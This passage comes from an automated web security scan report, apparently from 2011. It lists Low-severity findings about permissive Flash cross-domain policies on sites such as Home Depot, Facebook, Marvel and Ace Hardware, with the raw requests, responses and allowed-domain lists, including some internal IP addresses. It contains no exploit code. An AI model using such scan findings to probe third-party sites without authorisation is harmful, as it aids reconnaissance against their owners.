<allow-access-from domain="*.thuzi.com"/>
<allow-access-from domain="*.samsclub.com"/>
<allow-access-from domain="161.169.79.10"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.hansondodge.com"/>
<allow-access-from domain="*.thebrick.com"/>
<allow-access-from domain="s7demo.scene7.com"/>
<allow-access-from domain="*.richrelevance.com"/>
<allow-access-from domain="*.hit.homedepot.resource.com"/>
<allow-access-from domain="*.allurent.net"/>
<allow-access-from domain="*.ashro.com"/>
<allow-access-from domain="*.countrydoor.com"/>
<allow-access-from domain="*.ginnys.com"/>
<allow-access-from domain="*.grandpointe.com"/>
<allow-access-from domain="*.monroeandmain.com"/>
<allow-access-from domain="*.midnightvelvet.com"/>
<allow-access-from domain="*.raceteamgear.com"/>
<allow-access-from domain="*.swisscolony.com"/>
<allow-access-from domain="*.seventhavenue.com"/>
<allow-access-from domain="*.homevisions.com"/>
<allow-access-from domain="*.wards.com"/>
<allow-access-from domain="*.tenderfilet.com"/>
<allow-access-from domain="assets.k2sports.com"/>
<allow-access-from domain="assets.ridesnowboards.com"/>
<allow-access-from domain="assets1.k2sports.com"/>
<allow-access-from domain="assets1.ridesnowboards.com"/>
<allow-access-from domain="assets2.k2sports.com"/>
<allow-access-from domain="assets2.ridesnowboards.com"/>
<allow-access-from domain="161.211.2.28"/>
<allow-access-from domain="161.211.155.7"/>
<allow-access-from domain="ah-stg.fry.com"/>
<allow-access-from domain="cd-stg.fry.com"/>
<allow-access-from domain="gn-stg.fry.com"/>
<allow-access-from domain="gp-stg.fry.com"/>
<allow-access-from domain="hv-stg.fry.com"/>
<allow-access-from domain="mm-stg.fry.com"/>
<allow-access-from domain="mv-stg.fry.com"/>
<allow-access-from domain="mw-stg.fry.com"/>
<allow-access-from domain="rt-stg.fry.com"/>
<allow-access-from domain="rc-stg.fry.com"/>
<allow-access-from domain="tf-stg.fry.com"/>
<allow-access-from domain="sc-stg.fry.com"/>
<allow-access-from domain="sa-stg.fry.com"/>
<allow-access-from domain="shopdeluxe-v9-dev.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="shopdeluxe-v9-uat.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="stage.coach.com"/>
<allow-access-from domain="*.coach.com"/>
<allow-access-from domain="demandware.edgesuite.net"/>
<allow-access-from domain="*.buildabear.com"/>
<allow-access-from domain="*.babwtest.com"/>
<allow-access-from domain="customshop.mesfire.com"/>
<allow-access-from domain="stage.homeinspiration.homedepot.com "/>
<allow-access-from domain="homeinspiration.homedepot.com"/>
<allow-access-from domain="pointroll.com"/>
<allow-access-from domain="*.pointroll.com"/>
<allow-access-from domain="*.smartwool.com"/>
<allow-access-from domain="*.summitprojects.com"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="511.niteviewtech.com"/>
<allow-access-from domain="www.lauramercier.com"/>
<allow-access-from domain="*.lumberliquidators.com"/>
<allow-access-from domain="*.ae.com"/>
<allow-access-from domain="*.aezone.com"/>
<allow-access-from domain="s7everest.macromedia.com"/>
<allow-access-from domain="s7fuji.macromedia.com"/>
<allow-access-from domain="s7qa-is.macromedia.com"/>
<allow-access-from domain="officemax.companychecksandforms.com"/>
<allow-access-from domain="www.511deasbf.com"/>
<allow-access-from domain="*.511deasbf.com"/>
<allow-access-from domain="*.vcfcorp.com"/>
...[SNIP]...
<allow-access-from domain="*.asfurniture.com"/>
<allow-access-from domain="*.vcf.com"/>
...[SNIP]...
<allow-access-from domain="anthropologie.uat.venda.com"/>
<allow-access-from domain="anthropologie.live.venda.com"/>
<allow-access-from domain="*.511academy.com"/>
<allow-access-from domain="*.reedkrakoff.com"/>
<allow-access-from domain="stage.wearport.com"/>
<allow-access-from domain="*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.anthropologie.eu"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="www.leadbased.com"/>
<allow-access-from domain="*.mxbi.com"/>
<allow-access-from domain="*.jordans.com"/>
<allow-access-from domain="jordans.com"/>
<allow-access-from domain="jordansqa.weymouthdesign.com"/>
<allow-access-from domain="*.mercury.com"/>
<allow-access-from domain="*.cb2.com"/>
<allow-access-from domain="*.landofnod.com"/>
<allow-access-from domain="*.crateandbarrel.com"/>
<allow-access-from domain="*.crateandbarrel.ca"/>
<allow-access-from domain="cim-dev.deluxe.com"/>
<allow-access-from domain="cim-qa.deluxe.com"/>
<allow-access-from domain="www.deluxe-check-order.com"/>
<allow-access-from domain="wwwpreprod.deluxe-check-order.com"/>
<allow-access-from domain="*.vfimagewear.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.zumiez.com"/>
<allow-access-from domain="zumiez.com"/>
<allow-access-from domain="*.vfc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="service-apps.scene7.com"/>
<allow-access-from domain="service-apps-staging.scene7.com"/>
<allow-access-from domain="walmart.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps-staging.scene7.com"/>
<allow-access-from domain="63.241.188.118"/>
<allow-access-from domain="63.241.188.119"/>
<allow-access-from domain="63.241.188.116"/>
<allow-access-from domain="63.241.188.120"/>
<allow-access-from domain="63.241.188.121"/>
<allow-access-from domain="63.241.188.117"/>
<allow-access-from domain="63.241.188.122"/>
<allow-access-from domain="63.241.188.123"/>
<allow-access-from domain="63.241.188.124"/>
<allow-access-from domain="63.241.188.125"/>
<allow-access-from domain="stage.store.americangirl.com"/>
<allow-access-from domain="*.kohls.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="media.kohls.com.edgesuite.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.edgeboss.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscorporation.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscareers.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlsoncampus.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.apiservice.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="98.129.79.154" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="httpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="rtmpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mixercast.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fluid.com"/>
<allow-access-from domain="*.enlighten.com"/>
<allow-access-from domain="*.hunterdouglas.com"/>
<allow-access-from domain=".allurent.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="64.52.70.13"/>
<allow-access-from domain="64.52.70.30"/>
<allow-access-from domain="64.52.70.33"/>
<allow-access-from domain="64.52.70.60"/>
<allow-access-from domain="76.12.61.174"/>
<allow-access-from domain="*.kmart.com"/>
<allow-access-from domain="skavamp.com"/>
<allow-access-from domain="*.skavamp.com"/>
<allow-access-from domain="*.cloudfront.net"/>
<allow-access-from domain="www.grandinroad.com"/>
<allow-access-from domain="www.frontgate.com"/>
<allow-access-from domain="97.65.222.116"/>
<allow-access-from domain="97.65.222.115"/>
<allow-access-from domain="*.neptune.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="*.web.rga.com"/>
<allow-access-from domain="*.ny.rga.com"/>
<allow-access-from domain="content01.nimblefish.com"/>
<allow-access-from domain="cdn.nimblefish.com"/>
<allow-access-from domain="media.nimblefish.com"/>
<allow-access-from domain="nv.nimblefish.com"/>
<allow-access-from domain="app.nimblefish.com"/>
<allow-access-from domain="media.beta01.nimblefish.com"/>
<allow-access-from domain="nv.beta01.nimblefish.com"/>
<allow-access-from domain="app.beta01.nimblefish.com"/>
<allow-access-from domain="media.content01.nimblefish.com"/>
<allow-access-from domain="nv.content01.nimblefish.com"/>
<allow-access-from domain="app.content01.nimblefish.com"/>
<allow-access-from domain="*.511fbileeda.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.hottopic.com"/>
<allow-access-from domain="*.teamworkathletic.com "/>
<allow-access-from domain="*.scene7.com"/>
<allow-access-from domain="*.shopvcf.com"/>
<allow-access-from domain="shopvcf.com"/>
<allow-access-from domain="*.axelscript.com"/>
<allow-access-from domain="*.sherwin.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.sherwin-williams.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.resource.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.serving-sys.com"/>
<allow-access-from domain="*.modea.com"/>
<allow-access-from domain="*.mizunousa.com"/>
<allow-access-from domain="*.mizunorunning.com"/>
<allow-access-from domain="*.mizunocda.com"/>
<allow-access-from domain="*.footjoy.com"/>
<allow-access-from domain="*.footjoy.co.uk"/>
<allow-access-from domain="*.footjoy.com.fr"/>
<allow-access-from domain="*.footjoy.de"/>
<allow-access-from domain="*.footjoy.se"/>
<allow-access-from domain="*.footjoy.ca"/>
<allow-access-from domain="*.footjoy.com.au"/>
<allow-access-from domain="*.footjoy.jp"/>
<allow-access-from domain="*.footjoy.co.th"/>
<allow-access-from domain="*.footjoy.com.my"/>
<allow-access-from domain="*.footjoy.com.sg"/>
<allow-access-from domain="*.footjoy.co.kr"/>
<allow-access-from domain="*.footjoy.com.cn"/>
<allow-access-from domain="pitchinteractive.com"/>
<allow-access-from domain="*.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="flashmaxx.com" secure="true" />
...[SNIP]...
<allow-access-from domain="searsfb.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="ec2-184-72-166-175.compute-1.amazonaws.com"/>
<allow-access-from domain="*.getpapered.com"/>
<allow-access-from domain="*.englishpapercompany.com"/>
<allow-access-from domain="*.koolsquare.net"/>
<allow-access-from domain="*.target.com"/>
<allow-access-from domain="*.home.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cos.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.lvld.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="cp.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.at" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.be" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ca" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ch" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.hu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.il" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.in" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.jp" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.kr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.nz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.th" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.uk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ar" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.br" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.cn" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.co" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.hk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.mx" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.my" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pe" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ph" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.sg" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tw" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ve" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.de" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.dk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ee" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.es" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fi" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.gr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ie" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.it" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.lu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.nl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.no" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.pt" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.se" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.us" secure="true" />
...[SNIP]...
<allow-access-from domain="*.brooksbrothers.com"/>
<allow-access-from domain="*.whitneyenglish.com"/>
<allow-access-from domain="canadiantire.ca"/>
<allow-access-from domain="*.maxnow.com"/>
<allow-access-from domain="4.59.112.158"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="*.converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cust.aops-eds.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="kobe.nike.jess3.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.highschoolsports.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.skysports.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lequipe.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovation.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovationdev.digitas.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nikedev.framfab.dk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.akqa.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ostkcdn.com"/>
<allow-access-from domain="*.aggregateknowledge.com"/>
<allow-access-from domain="*.nikedev.com"/>
<allow-access-from domain="anthrode.uat.venda.com"/>
<allow-access-from domain="anthropologie.custqa.venda.com"/>
<allow-access-from domain="*.fingerhut.com"/>
<allow-access-from domain="*.gettington.com"/>
...[SNIP]...

6.70. https://secure.homedepot.ca/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.homedepot.ca
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure.homedepot.ca

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 31 Jan 2011 07:35:35 GMT
Content-Type: text/xml
Date: Mon, 16 May 2011 02:10:40 GMT
Content-Length: 339
Connection: close
Cache-Control: max-age=315360000
Expires: Wed, 12 May 2021 22:48:47 GMT

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*.homedepot.ca" />    <allow-access-from domain="*.startaconversation.com" />
   <allow-access-from domain="*.brightcove.com" />
...[SNIP]...

6.71. http://static.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.147.196
X-Cnection: close
Date: Mon, 16 May 2011 10:34:08 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.72. http://subscriptions.marvel.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://subscriptions.marvel.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: subscriptions.marvel.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:32 GMT
Server: Apache
Vary: Accept-Encoding
X-ServerNickName: Venom
Content-Length: 417
Connection: close
Content-Type: text/x-cross-domain-policy; charset=utf-8

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*.marvel.com" h
...[SNIP]...
<allow-access-from domain="i.annihil.us" />
<allow-access-from domain="*.marvel.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.2mdn.net" />
...[SNIP]...

6.73. https://subscriptions.marvel.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://subscriptions.marvel.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: subscriptions.marvel.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:36:24 GMT
Server: Apache
Vary: Accept-Encoding
X-ServerNickName: Cap
Content-Length: 417
Connection: close
Content-Type: text/x-cross-domain-policy; charset=utf-8

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*.marvel.com" h
...[SNIP]...
<allow-access-from domain="i.annihil.us" />
<allow-access-from domain="*.marvel.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.2mdn.net" />
...[SNIP]...

6.74. http://www.acehardware.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.acehardware.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:36 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "4e411c-2ba-4928fc0d4e900"
Accept-Ranges: bytes
Content-Length: 698
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 01:54:36 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.acehardware.com" />

...[SNIP]...
<allow-access-from domain="ace.imageg.net" />
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="preview.gsipartners.com" />
<allow-access-from domain="172.20.1.195" />
<allow-access-from domain="172.21.1.195" />
<allow-access-from domain="206.16.220.195" />
<allow-access-from domain="63.240.110.195" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

6.75. https://www.acehardware.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.acehardware.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.acehardware.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:12:28 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "4e411c-2ba-4928fc0d4e900"
Accept-Ranges: bytes
Content-Length: 698
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 02:12:28 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.acehardware.com" />

...[SNIP]...
<allow-access-from domain="ace.imageg.net" />
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="preview.gsipartners.com" />
<allow-access-from domain="172.20.1.195" />
<allow-access-from domain="172.21.1.195" />
<allow-access-from domain="206.16.220.195" />
<allow-access-from domain="63.240.110.195" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

6.76. http://www.armaniexchange.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.armaniexchange.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.armaniexchange.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 04 May 2011 19:54:43 GMT
ETag: "206-a0b786c0"
Content-Type: application/xml
Cache-Control: max-age=600
Expires: Mon, 16 May 2011 02:05:22 GMT
Date: Mon, 16 May 2011 01:55:22 GMT
Content-Length: 518
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.overlay.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="ax-life.com" />
<allow-access-from domain="ii.armaniexchange.com" />
<allow-access-from domain="ii.marketlive.com" />
<allow-access-from domain=" origin-ii-prod-rw.marketlive.com" />
<allow-access-from domain="ii1-rev-rw.marketlive.com" />
...[SNIP]...

6.77. https://www.armaniexchange.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.armaniexchange.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.armaniexchange.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 04 May 2011 19:54:43 GMT
ETag: "206-a0b786c0"
Content-Type: application/xml
Cache-Control: max-age=600
Expires: Mon, 16 May 2011 02:23:16 GMT
Date: Mon, 16 May 2011 02:13:16 GMT
Content-Length: 518
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.overlay.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="ax-life.com" />
<allow-access-from domain="ii.armaniexchange.com" />
<allow-access-from domain="ii.marketlive.com" />
<allow-access-from domain=" origin-ii-prod-rw.marketlive.com" />
<allow-access-from domain="ii1-rev-rw.marketlive.com" />
...[SNIP]...

6.78. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.42.208.77
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
